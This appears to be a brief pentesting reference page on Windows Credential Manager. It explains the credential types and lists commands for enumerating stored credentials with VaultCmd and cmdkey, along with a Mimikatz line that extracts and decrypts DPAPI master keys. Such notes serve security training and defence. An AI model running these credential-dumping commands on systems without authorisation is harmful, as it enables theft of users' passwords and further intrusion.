Windows Credential Manager
Theory
Credential Manager is a Windows feature that stores logon-sensitive information for websites, applications, and networks. It contains login credentials such as usernames, passwords, and internet addresses. There are four credential categories:
Web credentials contain authentication details stored in Internet browsers or other applications.
Windows credentials contain Windows authentication details, such as NTLM or Kerberos.
Generic credentials contain basic authentication details, such as clear-text usernames and passwords.
Certificate-based credentials: Athunticated details based on certifications.
Practice
On Windows systems Vaultcmd & cmdkey can be used to list credentials.
# List vaults
C:\Users\Administrator> VaultCmd /list
# Extract and decrypt all master keys
sekurlsa::dpapi
# List property of a vault
C:\Users\Administrator> VaultCmd /listproperties:"Web Credentials"
# List creds in a vault
C:\Users\Administrator> VaultCmd /listcreds:"Web Credentials"
# List creds with cmdkey
C:\Users\Administrator> cmdkey /listResources
Last updated
Was this helpful?
